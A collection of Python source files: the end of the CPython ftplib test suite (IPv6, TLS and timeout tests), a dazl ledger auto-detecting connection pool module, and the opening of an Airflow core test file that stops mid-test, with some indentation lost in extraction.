    """Over-long lines coming from the server must raise ftplib.Error."""
    self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
    received = []
    self.assertRaises(ftplib.Error,
                      self.client.retrlines, 'retr', received.append)

def test_storlines_too_long(self):
    """Over-long lines in the upload source must raise ftplib.Error."""
    f = io.BytesIO(b'x' * self.client.maxline * 2)
    self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
@skipUnless(support.IPV6_ENABLED, "IPv6 not enabled")
class TestIPv6Environment(TestCase):
    """Rerun the connection primitives against an IPv6 dummy server."""

    def setUp(self):
        self.server = DummyFTPServer((HOSTv6, 0), af=socket.AF_INET6)
        self.server.start()
        self.client = ftplib.FTP(timeout=TIMEOUT)
        self.client.connect(self.server.host, self.server.port)

    def tearDown(self):
        # shut down client/server and drop any leftover asyncore channels
        self.client.close()
        self.server.stop()
        asyncore.close_all(ignore_all=True)

    def test_af(self):
        # the address family must reflect the IPv6 connection
        self.assertEqual(self.client.af, socket.AF_INET6)

    def test_makeport(self):
        # over IPv6 the extended EPRT command must be used
        with self.client.makeport():
            self.assertEqual(self.server.handler_instance.last_received_cmd,
                             'eprt')

    def test_makepasv(self):
        # over IPv6 the extended EPSV command must be used
        host, port = self.client.makepasv()
        conn = socket.create_connection((host, port), timeout=TIMEOUT)
        conn.close()
        self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv')

    def test_transfer(self):
        """A full RETR must succeed in both passive and active mode."""
        def retr():
            def callback(data):
                received.append(data.decode('ascii'))
            received = []
            self.client.retrbinary('retr', callback)
            self.assertEqual(len(''.join(received)), len(RETR_DATA))
            self.assertEqual(''.join(received), RETR_DATA)
        self.client.set_pasv(True)
        retr()
        self.client.set_pasv(False)
        retr()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClassMixin(TestFTPClass):
    """Repeat TestFTPClass tests starting the TLS layer for both control
    and data connections first.
    """

    def setUp(self):
        self.server = DummyTLS_FTPServer((HOST, 0))
        self.server.start()
        self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
        self.client.connect(self.server.host, self.server.port)
        # enable TLS
        self.client.auth()
        self.client.prot_p()
@skipUnless(ssl, "SSL not available")
class TestTLS_FTPClass(TestCase):
    """Specific TLS_FTP class tests."""

    def setUp(self):
        self.server = DummyTLS_FTPServer((HOST, 0))
        self.server.start()
        self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
        self.client.connect(self.server.host, self.server.port)

    def tearDown(self):
        self.client.close()
        self.server.stop()
        asyncore.close_all(ignore_all=True)

    def test_control_connection(self):
        # AUTH upgrades the control channel to TLS
        self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
        self.client.auth()
        self.assertIsInstance(self.client.sock, ssl.SSLSocket)

    def test_data_connection(self):
        """Data channel security must follow PROT P / PROT C."""
        # clear text
        with self.client.transfercmd('list') as sock:
            self.assertNotIsInstance(sock, ssl.SSLSocket)
        self.assertEqual(self.client.voidresp(), "226 transfer complete")

        # secured, after PROT P
        self.client.prot_p()
        with self.client.transfercmd('list') as sock:
            self.assertIsInstance(sock, ssl.SSLSocket)
        self.assertEqual(self.client.voidresp(), "226 transfer complete")

        # PROT C is issued, the connection must be in cleartext again
        self.client.prot_c()
        with self.client.transfercmd('list') as sock:
            self.assertNotIsInstance(sock, ssl.SSLSocket)
        self.assertEqual(self.client.voidresp(), "226 transfer complete")

    def test_login(self):
        # login() is supposed to implicitly secure the control connection
        self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
        self.client.login()
        self.assertIsInstance(self.client.sock, ssl.SSLSocket)
        # make sure that AUTH TLS doesn't get issued again
        self.client.login()

    def test_auth_issued_twice(self):
        # a second AUTH must be rejected
        self.client.auth()
        self.assertRaises(ValueError, self.client.auth)

    def test_auth_ssl(self):
        # AUTH also works with PROTOCOL_SSLv23; restore TLSv1 afterwards
        try:
            self.client.ssl_version = ssl.PROTOCOL_SSLv23
            self.client.auth()
            self.assertRaises(ValueError, self.client.auth)
        finally:
            self.client.ssl_version = ssl.PROTOCOL_TLSv1

    def test_context(self):
        """A context argument is mutually exclusive with keyfile/certfile."""
        self.client.quit()
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
                          context=ctx)
        self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
                          context=ctx)
        self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
                          keyfile=CERTFILE, context=ctx)
        # the supplied context must actually be used for both channels
        self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
        self.client.connect(self.server.host, self.server.port)
        self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
        self.client.auth()
        self.assertIs(self.client.sock.context, ctx)
        self.assertIsInstance(self.client.sock, ssl.SSLSocket)
        self.client.prot_p()
        with self.client.transfercmd('list') as sock:
            self.assertIs(sock.context, ctx)
            self.assertIsInstance(sock, ssl.SSLSocket)

    def test_ccc(self):
        # CCC downgrades the control channel back to cleartext
        self.assertRaises(ValueError, self.client.ccc)
        self.client.login(secure=True)
        self.assertIsInstance(self.client.sock, ssl.SSLSocket)
        self.client.ccc()
        self.assertRaises(ValueError, self.client.sock.unwrap)

    def test_check_hostname(self):
        """With check_hostname on, 127.0.0.1 must fail but localhost match."""
        self.client.quit()
        ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
        ctx.verify_mode = ssl.CERT_REQUIRED
        ctx.check_hostname = True
        ctx.load_verify_locations(CAFILE)
        self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)

        # 127.0.0.1 doesn't match SAN
        self.client.connect(self.server.host, self.server.port)
        with self.assertRaises(ssl.CertificateError):
            self.client.auth()
        # exception quits connection

        self.client.connect(self.server.host, self.server.port)
        self.client.prot_p()
        with self.assertRaises(ssl.CertificateError):
            with self.client.transfercmd("list") as sock:
                pass
        self.client.quit()

        self.client.connect("localhost", self.server.port)
        self.client.auth()
        self.client.quit()

        self.client.connect("localhost", self.server.port)
        self.client.prot_p()
        with self.client.transfercmd("list") as sock:
            pass
class TestTimeouts(TestCase):
    """Check how FTP() applies default, explicit, and absent timeouts."""

    def setUp(self):
        self.evt = threading.Event()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(20)
        self.port = support.bind_port(self.sock)
        self.server_thread = threading.Thread(target=self.server)
        self.server_thread.start()
        # Wait for the server to be ready.
        self.evt.wait()
        self.evt.clear()
        # point the FTP class default port at our one-shot server
        self.old_port = ftplib.FTP.port
        ftplib.FTP.port = self.port

    def tearDown(self):
        ftplib.FTP.port = self.old_port
        self.server_thread.join()

    def server(self):
        # This method sets the evt 3 times:
        # 1) when the connection is ready to be accepted.
        # 2) when it is safe for the caller to close the connection
        # 3) when we have closed the socket
        self.sock.listen()
        # (1) Signal the caller that we are ready to accept the connection.
        self.evt.set()
        try:
            conn, addr = self.sock.accept()
        except socket.timeout:
            pass
        else:
            conn.sendall(b"1 Hola mundo\n")
            conn.shutdown(socket.SHUT_WR)
            # (2) Signal the caller that it is safe to close the socket.
            self.evt.set()
            conn.close()
        finally:
            self.sock.close()

    def testTimeoutDefault(self):
        # default -- use global socket timeout
        self.assertIsNone(socket.getdefaulttimeout())
        socket.setdefaulttimeout(30)
        try:
            ftp = ftplib.FTP(HOST)
        finally:
            socket.setdefaulttimeout(None)
        self.assertEqual(ftp.sock.gettimeout(), 30)
        self.evt.wait()
        ftp.close()

    def testTimeoutNone(self):
        # no timeout -- do not use global socket timeout
        self.assertIsNone(socket.getdefaulttimeout())
        socket.setdefaulttimeout(30)
        try:
            ftp = ftplib.FTP(HOST, timeout=None)
        finally:
            socket.setdefaulttimeout(None)
        self.assertIsNone(ftp.sock.gettimeout())
        self.evt.wait()
        ftp.close()

    def testTimeoutValue(self):
        # a value
        ftp = ftplib.FTP(HOST, timeout=30)
        self.assertEqual(ftp.sock.gettimeout(), 30)
        self.evt.wait()
        ftp.close()

    def testTimeoutConnect(self):
        # timeout passed to connect() rather than the constructor
        ftp = ftplib.FTP()
        ftp.connect(HOST, timeout=30)
        self.assertEqual(ftp.sock.gettimeout(), 30)
        self.evt.wait()
        ftp.close()

    def testTimeoutDifferentOrder(self):
        # timeout in the constructor, connect() called separately
        ftp = ftplib.FTP(timeout=30)
        ftp.connect(HOST)
        self.assertEqual(ftp.sock.gettimeout(), 30)
        self.evt.wait()
        ftp.close()

    def testTimeoutDirectAccess(self):
        # timeout assigned to the attribute before connect()
        ftp = ftplib.FTP()
        ftp.timeout = 30
        ftp.connect(HOST)
        self.assertEqual(ftp.sock.gettimeout(), 30)
        self.evt.wait()
        ftp.close()
class MiscTestCase(TestCase):
    def test__all__(self):
        """ftplib.__all__ must cover every public name except the blacklist."""
        blacklist = {'MSG_OOB', 'FTP_PORT', 'MAXLINE', 'CRLF', 'B_CRLF',
                     'Error', 'parse150', 'parse227', 'parse229', 'parse257',
                     'print_line', 'ftpcp', 'test'}
        support.check__all__(self, ftplib, blacklist=blacklist)
def test_main():
    """Run the whole suite, verifying that no threads are left behind."""
    tests = [TestFTPClass, TestTimeouts,
             TestIPv6Environment,
             TestTLS_FTPClassMixin, TestTLS_FTPClass,
             MiscTestCase]
    thread_info = support.threading_setup()
    try:
        support.run_unittest(*tests)
    finally:
        support.threading_cleanup(*thread_info)


if __name__ == '__main__':
    test_main()
|
autodetect.py
|
# Copyright (c) 2017-2021 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
from datetime import datetime
from functools import partial
from threading import Event, RLock, Thread
from typing import TYPE_CHECKING, Dict, Iterable, Optional, Union
from .. import LOG
from ..prim import Party
from ..scheduler import Invoker
from ._base import LedgerClient, LedgerConnectionOptions, LedgerNetwork
from .errors import ConnectionTimeoutError, UserTerminateRequest
from .oauth import oauth_flow
from .v1.grpc import GRPCv1Connection
if TYPE_CHECKING:
from ..client._conn_settings import HTTPConnectionSettings
from ..client.ledger import LedgerMetadata
__all__ = ["AutodetectLedgerNetwork", "AutodetectConnection"]
class AutodetectLedgerNetwork(LedgerNetwork):
    """
    Auto-detecting pool implementation that automatically routes to the correct pool
    implementation based on the scheme specified in the URL.

    A daemon thread (:meth:`_main`) waits for the first connection to be
    created, runs ledger detection over it, and resolves
    ``self._ledger_future`` with the resulting metadata.
    """

    def __init__(self, invoker: "Invoker", options: "LedgerConnectionOptions"):
        self._invoker = invoker
        self._options = options
        self._closed = False
        # set once the very first connection object has been created
        self._first_connection_evt = Event()
        self._first_connection = None  # type: Optional[AutodetectConnection]
        self._connections = dict()  # type: Dict[HTTPConnectionSettings, AutodetectConnection]
        self._lock = RLock()
        # resolved (or failed) by the monitor thread with the ledger metadata
        self._ledger_future = self._invoker.create_future()
        self._main_thread = Thread(target=self._main, daemon=True)
        self._main_thread.start()

    async def ledger(self) -> "LedgerMetadata":
        """Return the ledger metadata, waiting for detection to complete."""
        return await self._ledger_future

    async def connect_anonymous(
        self, settings: "HTTPConnectionSettings", context_path: "Optional[str]"
    ) -> None:
        """
        Establish a single no-Party connection (but only if no other connections have already been
        established). This is used by specialized setups that do not require Parties to be supplied
        for any reason (such as fetching initial ledger metadata).
        """
        self._get_connection(settings, context_path)
        await self.ledger()

    async def connect(
        self,
        party: "Union[str, Party]",
        settings: "HTTPConnectionSettings",
        context_path: "Optional[str]" = None,
    ) -> LedgerClient:
        """Create (or reuse) a connection and wrap it in a client for *party*.

        :raises RuntimeError: if the detected protocol version is not "v1".
        """
        LOG.info("Establishing a connection to %s on party %s...", settings, party)
        if settings.oauth:
            # run the OAuth flow up front so the cached connection carries
            # the refreshed credentials
            new_oauth_settings = await oauth_flow(settings.oauth)
            settings = settings._replace(oauth=new_oauth_settings)
        conn = self._get_connection(settings, context_path)
        ledger = await self.ledger()
        if ledger.protocol_version == "v1":
            from .v1.grpc import GRPCv1LedgerClient

            return GRPCv1LedgerClient(conn, ledger, Party(party))
        elif ledger.protocol_version == "v0":
            raise RuntimeError(f"Unsupported protocol version: {ledger.protocol_version}")
        else:
            raise RuntimeError(f"Unknown protocol version: {ledger.protocol_version}")

    async def upload_package(self, dar_contents: bytes) -> None:
        """Upload a DAR over the first established connection.

        :raises RuntimeError: if no connection has been established yet.
        """
        connection = self._first_connection
        if connection is None:
            raise RuntimeError("cannot upload a package until a connection has been established")
        from .v1.grpc import grpc_upload_package

        await self._invoker.run_in_executor(partial(grpc_upload_package, connection, dar_contents))

    async def set_time(self, new_time: datetime) -> None:
        """Set the ledger's time over the first established connection.

        :raises RuntimeError: if no connection has been established yet.
        """
        connection = self._first_connection
        if connection is None:
            # fixed copy-pasted message from upload_package()
            raise RuntimeError("cannot set time until a connection has been established")
        from .v1.grpc import grpc_set_time

        ledger = await self.ledger()
        return await self._invoker.run_in_executor(
            partial(grpc_set_time, connection, ledger.ledger_id, new_time)
        )

    async def close(self) -> None:
        """Close every tracked connection, logging (not raising) failures.

        NOTE(review): unlike :meth:`_close_all`, this does not set
        ``self._closed``; confirm whether callers rely on being able to open
        new connections after ``close()``.
        """
        with self._lock:
            connections = list(self._connections.values())
            self._connections.clear()
        for connection in connections:
            # noinspection PyBroadException
            try:
                connection.close()
            except Exception:  # noqa — was a bare except; keep shutdown best-effort
                LOG.exception("Had trouble closing a connection.")

    def _close_all(self) -> None:
        """Close everything and mark the pool closed (monitor-thread cleanup)."""
        LOG.debug("Closing all connections...")
        try:
            with self._lock:
                connections = list(self._connections.values())
                self._connections.clear()
            for connection in connections:
                # noinspection PyBroadException
                try:
                    connection.close()
                except Exception:  # noqa
                    LOG.exception("Had trouble closing a connection.")
        finally:
            LOG.debug("Marked the connection pool as closed.")
            self._closed = True

    @property
    def closed(self):
        # True once _close_all() has run
        return self._closed

    def _get_connection(
        self, settings: "HTTPConnectionSettings", context_path: "Optional[str]"
    ) -> "AutodetectConnection":
        """Return the cached connection for *settings*, creating it if needed.

        The first connection created also unblocks the monitor thread.

        :raises TimeoutError: if the internal lock cannot be acquired quickly.
        :raises IOError: if the pool has already been closed.
        """
        if not self._lock.acquire(timeout=5):
            raise TimeoutError("Could not acquire an internal lock quickly enough.")
        try:
            if self._closed:
                raise IOError("LedgerNetwork.close() has already been called")
            if not self._connections:
                LOG.debug("Initializing the first connection to %s...", settings)
                self._first_connection = AutodetectConnection(
                    self._invoker, self._options, settings, context_path
                )
                self._connections[settings] = self._first_connection
                self._first_connection_evt.set()
                return self._first_connection
            else:
                LOG.debug("Initializing a connection to %s...", settings)
                stub = self._connections.get(settings)
                if stub is None:
                    stub = AutodetectConnection(
                        self._invoker, self._options, settings, context_path
                    )
                    self._connections[settings] = stub
                return stub
        except BaseException:  # noqa — log absolutely everything, then re-raise
            LOG.exception("An error occurred trying to create a connection.")
            raise
        finally:
            self._lock.release()

    def _main(self) -> None:
        """Monitor-thread body: wait for the first connection, detect the ledger."""
        timeout = self._options.connect_timeout
        try:
            LOG.debug(
                "Waiting for the first connection to be established (timeout: %s)...", timeout
            )
            if not self._first_connection_evt.wait(
                timeout=timeout.total_seconds() if timeout is not None else None
            ):
                LOG.error(
                    "Waited %s for the first connection but it never came. Aborting...", timeout
                )
                raise Exception("first connection timeout")

            LOG.debug("Starting ledger detection.")
            conn = self._first_connection
            if conn is not None:
                for i, metadata in enumerate(_monitor_ledger_network(conn)):
                    if i == 0:
                        # bind `metadata` as a default argument: the lambda runs
                        # later on the event loop, after the loop variable may
                        # have been rebound (late-binding closure pitfall)
                        self._invoker.run_in_loop(
                            lambda m=metadata: self._ledger_future.set_result(m)
                        )
                    elif metadata is not None:
                        LOG.warning("The network monitor thread emitted multiple metadata!")
        except (UserTerminateRequest, ConnectionTimeoutError) as ex:
            # re-raise these, but they are "known" errors so a stack trace in the logs would just
            # create clutter
            self._invoker.run_in_loop(lambda: self._ledger_future.set_exception(ex))
        except Exception as ex:
            # unexpected exception raised, so provide lots of information that might help debug
            LOG.exception("The main monitoring thread died.")

            def _maybe_apply_error():
                if not self._ledger_future.done():
                    LOG.error("The above error was propagated as an initialization error.")
                    self._ledger_future.set_exception(ex)

            # if we haven't even been able to initialize, propagate this error to the init future
            self._invoker.run_in_loop(_maybe_apply_error)
        finally:
            self._close_all()
class AutodetectConnection(GRPCv1Connection):
    """Alias of GRPCv1Connection used by the auto-detecting pool."""
    pass
def _monitor_ledger_network(connection: "AutodetectConnection") -> "Iterable[LedgerMetadata]":
    """
    Monitor the very first connection established and provide general information about
    the ledger to other parties.
    """
    from .v1.grpc import grpc_detect_ledger_id, grpc_main_thread

    detected_id = grpc_detect_ledger_id(connection)
    if detected_id is None:
        # gRPC detection failed; there is no fallback protocol anymore
        if connection.settings.scheme in ("grpc", "grpcs"):
            raise Exception(
                "The protocol was specified as gRPC, but the backend does not support it.")
        LOG.error("Couldn't connect over gRPC.")
        raise Exception("Connection to the v0 REST API is no longer supported.")

    LOG.info("Ledger ID: %s", detected_id)
    return grpc_main_thread(connection=connection, ledger_id=detected_id)
|
test_core.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import multiprocessing
import os
import signal
import unittest
from datetime import timedelta
from time import sleep
from dateutil.relativedelta import relativedelta
from numpy.testing import assert_array_almost_equal
from airflow import settings
from airflow.exceptions import AirflowException, AirflowTaskTimeout
from airflow.hooks.base_hook import BaseHook
from airflow.jobs.local_task_job import LocalTaskJob
from airflow.models import DagBag, DagRun, TaskFail, TaskInstance
from airflow.models.baseoperator import BaseOperator
from airflow.models.dag import DAG
from airflow.operators.bash import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.operators.python import PythonOperator
from airflow.settings import Session
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from airflow.utils.state import State
from airflow.utils.timezone import datetime
from airflow.utils.types import DagRunType
from tests.test_utils.config import conf_vars
DEV_NULL = '/dev/null'
DEFAULT_DATE = datetime(2015, 1, 1)
TEST_DAG_ID = 'unit_tests'
class OperatorSubclass(BaseOperator):
    """
    An operator to test template substitution
    """

    # the only field Jinja templating is applied to
    template_fields = ['some_templated_field']

    def __init__(self, some_templated_field, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.some_templated_field = some_templated_field

    def execute(self, context):
        # no-op: the tests only exercise template rendering
        pass
class TestCore(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
    """Build a throwaway DAG plus handles into the example bash DAG."""
    self.dagbag = DagBag(
        dag_folder=DEV_NULL, include_examples=True)
    self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
    self.dag = DAG(TEST_DAG_ID, default_args=self.args)
    self.dag_bash = self.dagbag.dags['example_bash_operator']
    self.runme_0 = self.dag_bash.get_task('runme_0')
    self.run_after_loop = self.dag_bash.get_task('run_after_loop')
    self.run_this_last = self.dag_bash.get_task('run_this_last')

def tearDown(self):
    """Delete every DB row the test DAG created, then close the session."""
    session = Session()
    session.query(DagRun).filter(
        DagRun.dag_id == TEST_DAG_ID).delete(
        synchronize_session=False)
    session.query(TaskInstance).filter(
        TaskInstance.dag_id == TEST_DAG_ID).delete(
        synchronize_session=False)
    session.query(TaskFail).filter(
        TaskFail.dag_id == TEST_DAG_ID).delete(
        synchronize_session=False)
    session.commit()
    session.close()
def test_check_operators(self):
    """CheckOperator and ValueCheckOperator must run against a scratch table."""
    conn_id = "sqlite_default"

    captain_hook = BaseHook.get_hook(conn_id=conn_id)  # quite funny :D
    captain_hook.run("CREATE TABLE operator_test_table (a, b)")
    captain_hook.run("insert into operator_test_table values (1,2)")

    op = CheckOperator(
        task_id='check',
        sql="select count(*) from operator_test_table",
        conn_id=conn_id,
        dag=self.dag)
    op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    # 100 is within 10% tolerance of pass_value 95
    op = ValueCheckOperator(
        task_id='value_check',
        pass_value=95,
        tolerance=0.1,
        conn_id=conn_id,
        sql="SELECT 100",
        dag=self.dag)
    op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

    captain_hook.run("drop table operator_test_table")

def test_clear_api(self):
    """task.clear() with up/downstream must leave the TI queryable."""
    task = self.dag_bash.tasks[0]
    task.clear(
        start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
        upstream=True, downstream=True)
    ti = TaskInstance(task=task, execution_date=DEFAULT_DATE)
    ti.are_dependents_done()
def test_illegal_args(self):
    """
    Tests that Operators reject illegal arguments
    """
    msg = 'Invalid arguments were passed to BashOperator (task_id: test_illegal_args).'
    # with allow_illegal_arguments on, unknown kwargs only warn
    with conf_vars({('operators', 'allow_illegal_arguments'): 'True'}):
        with self.assertWarns(PendingDeprecationWarning) as warning:
            BashOperator(
                task_id='test_illegal_args',
                bash_command='echo success',
                dag=self.dag,
                illegal_argument_1234='hello?')
        assert any(msg in str(w) for w in warning.warnings)

def test_illegal_args_forbidden(self):
    """
    Tests that operators raise exceptions on illegal arguments when
    illegal arguments are not allowed.
    """
    with self.assertRaises(AirflowException) as ctx:
        BashOperator(
            task_id='test_illegal_args',
            bash_command='echo success',
            dag=self.dag,
            illegal_argument_1234='hello?')
    self.assertIn(
        ('Invalid arguments were passed to BashOperator '
         '(task_id: test_illegal_args).'),
        str(ctx.exception))
def test_bash_operator(self):
    """A trivial bash command must run successfully."""
    op = BashOperator(
        task_id='test_bash_operator',
        bash_command="echo success",
        dag=self.dag)
    op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

def test_bash_operator_multi_byte_output(self):
    """Multi-byte (UTF-8) command output must not break log capture."""
    op = BashOperator(
        task_id='test_multi_byte_bash_operator',
        bash_command="echo \u2600",
        dag=self.dag,
        output_encoding='utf-8')
    op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

def test_bash_operator_kill(self):
    """On execution_timeout the sleep subprocess must be killed, not leaked."""
    import psutil
    # embed our pid in the sleep duration so the process is recognizable
    sleep_time = "100%d" % os.getpid()
    op = BashOperator(
        task_id='test_bash_operator_kill',
        execution_timeout=timedelta(seconds=1),
        bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
        dag=self.dag)
    self.assertRaises(
        AirflowTaskTimeout,
        op.run,
        start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
    sleep(2)
    # scan the process table for a survivor; finding one is a failure
    pid = -1
    for proc in psutil.process_iter():
        if proc.cmdline() == ['sleep', sleep_time]:
            pid = proc.pid
    if pid != -1:
        os.kill(pid, signal.SIGTERM)
        self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_on_failure_callback(self):
    """on_failure_callback must fire with the exception in the context."""
    # Annoying workaround for nonlocal not existing in python 2
    data = {'called': False}

    def check_failure(context, test_case=self):
        data['called'] = True
        error = context.get('exception')
        test_case.assertIsInstance(error, AirflowException)

    op = BashOperator(
        task_id='check_on_failure_callback',
        bash_command="exit 1",
        dag=self.dag,
        on_failure_callback=check_failure)
    self.assertRaises(
        AirflowException,
        op.run,
        start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
    self.assertTrue(data['called'])

def test_dryrun(self):
    """dry_run() must render templates without executing the command."""
    op = BashOperator(
        task_id='test_dryrun',
        bash_command="echo success",
        dag=self.dag)
    op.dry_run()

def test_sqlite(self):
    """SqliteOperator must execute DDL against the default connection."""
    import airflow.providers.sqlite.operators.sqlite
    op = airflow.providers.sqlite.operators.sqlite.SqliteOperator(
        task_id='time_sqlite',
        sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
        dag=self.dag)
    op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
    """A PythonOperator sleeping past execution_timeout must be stopped."""
    op = PythonOperator(
        task_id='test_timeout',
        execution_timeout=timedelta(seconds=1),
        python_callable=lambda: sleep(5),
        dag=self.dag)
    self.assertRaises(
        AirflowTaskTimeout,
        op.run,
        start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

def test_python_op(self):
    """templates_dict values must be rendered before the callable runs."""
    def test_py_op(templates_dict, ds, **kwargs):
        if not templates_dict['ds'] == ds:
            raise Exception("failure")

    op = PythonOperator(
        task_id='test_py_op',
        python_callable=test_py_op,
        templates_dict={'ds': "{{ ds }}"},
        dag=self.dag)
    op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)

def test_complex_template(self):
    """Templating must recurse into nested containers of a templated field."""
    def verify_templated_field(context):
        self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
                         context['ds'])

    op = OperatorSubclass(
        task_id='test_complex_template',
        some_templated_field={
            'foo': '123',
            'bar': ['baz', '{{ ds }}']
        },
        dag=self.dag)
    # replace execute so the assertion runs with the rendered context
    op.execute = verify_templated_field
    op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
    """
    Test templates can handle objects with no sense of truthiness
    """
    class NonBoolObject:
        def __len__(self):  # pylint: disable=invalid-length-returned
            return NotImplemented

        def __bool__(self):
            return NotImplemented

    op = OperatorSubclass(
        task_id='test_bad_template_obj',
        some_templated_field=NonBoolObject(),
        dag=self.dag)
    # must not crash on the un-truthy templated field
    op.resolve_template_files()
def test_task_get_template(self):
    """The rendered template context must expose the documented date fields."""
    TI = TaskInstance
    ti = TI(
        task=self.runme_0, execution_date=DEFAULT_DATE)
    ti.dag = self.dag_bash
    ti.run(ignore_ti_state=True)
    context = ti.get_template_context()

    # DEFAULT DATE is 2015-01-01
    self.assertEqual(context['ds'], '2015-01-01')
    self.assertEqual(context['ds_nodash'], '20150101')

    # next_ds is 2015-01-02 as the dag interval is daily
    self.assertEqual(context['next_ds'], '2015-01-02')
    self.assertEqual(context['next_ds_nodash'], '20150102')

    # prev_ds is 2014-12-31 as the dag interval is daily
    self.assertEqual(context['prev_ds'], '2014-12-31')
    self.assertEqual(context['prev_ds_nodash'], '20141231')

    self.assertEqual(context['ts'], '2015-01-01T00:00:00+00:00')
    self.assertEqual(context['ts_nodash'], '20150101T000000')
    self.assertEqual(context['ts_nodash_with_tz'], '20150101T000000+0000')

    self.assertEqual(context['yesterday_ds'], '2014-12-31')
    self.assertEqual(context['yesterday_ds_nodash'], '20141231')

    self.assertEqual(context['tomorrow_ds'], '2015-01-02')
    self.assertEqual(context['tomorrow_ds_nodash'], '20150102')

def test_local_task_job(self):
    """A LocalTaskJob wrapping a TI must run to completion."""
    TI = TaskInstance
    ti = TI(
        task=self.runme_0, execution_date=DEFAULT_DATE)
    job = LocalTaskJob(task_instance=ti, ignore_ti_state=True)
    job.run()

def test_raw_job(self):
    """Running the TI directly (no job wrapper) must succeed."""
    TI = TaskInstance
    ti = TI(
        task=self.runme_0, execution_date=DEFAULT_DATE)
    ti.dag = self.dag_bash
    ti.run(ignore_ti_state=True)
def test_round_time(self):
    """round_time() snaps a datetime onto the enclosing interval boundary."""
    # without an explicit start date
    self.assertEqual(
        datetime(2015, 1, 1, 0, 0),
        round_time(datetime(2015, 1, 1, 6), timedelta(days=1)))
    self.assertEqual(
        datetime(2015, 1, 1, 0, 0),
        round_time(datetime(2015, 1, 2), relativedelta(months=1)))

    # with a one-day interval anchored at 2015-09-14: on-boundary inputs
    # stay put, off-boundary inputs round to the nearest boundary
    anchor = datetime(2015, 9, 14, 0, 0)
    expectations = [
        (datetime(2015, 9, 16, 0, 0), datetime(2015, 9, 16, 0, 0)),
        (datetime(2015, 9, 15, 0, 0), datetime(2015, 9, 15, 0, 0)),
        (datetime(2015, 9, 14, 0, 0), datetime(2015, 9, 14, 0, 0)),
        (datetime(2015, 9, 14, 0, 0), datetime(2015, 9, 13, 0, 0)),
    ]
    for expected, moment in expectations:
        self.assertEqual(expected, round_time(moment, timedelta(1), anchor))
def test_infer_time_unit(self):
    """infer_time_unit() picks the unit that keeps magnitudes readable."""
    expectations = {
        'minutes': [130, 5400, 10],
        'seconds': [110, 50, 10, 100],
        'hours': [100000, 50000, 10000, 20000],
        'days': [200000, 100000],
    }
    for unit, durations in expectations.items():
        self.assertEqual(unit, infer_time_unit(durations))
def test_scale_time_units(self):
    """scale_time_units() converts second counts into the requested unit."""
    # use assert_almost_equal from numpy.testing since we are comparing
    # floating point arrays
    cases = [
        ([130, 5400, 10], 'minutes', [2.167, 90.0, 0.167]),
        ([110, 50, 10, 100], 'seconds', [110.0, 50.0, 10.0, 100.0]),
        ([100000, 50000, 10000, 20000], 'hours',
         [27.778, 13.889, 2.778, 5.556]),
        ([200000, 100000], 'days', [2.315, 1.157]),
    ]
    for durations, unit, expected in cases:
        scaled = scale_time_units(durations, unit)
        assert_array_almost_equal(scaled, expected, decimal=3)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
    def test_terminate_task(self):
        """If a task instance's db state get deleted, it should fail"""
        from airflow.executors.sequential_executor import SequentialExecutor
        TI = TaskInstance
        # 'sleeps_forever' never finishes on its own, so only an external
        # event (the row deletion below) can end the run.
        dag = self.dagbag.dags.get('test_utils')
